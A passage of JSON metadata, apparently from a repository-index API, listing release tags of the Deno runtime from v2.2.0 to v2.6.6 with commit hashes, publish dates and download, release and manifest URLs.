d":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/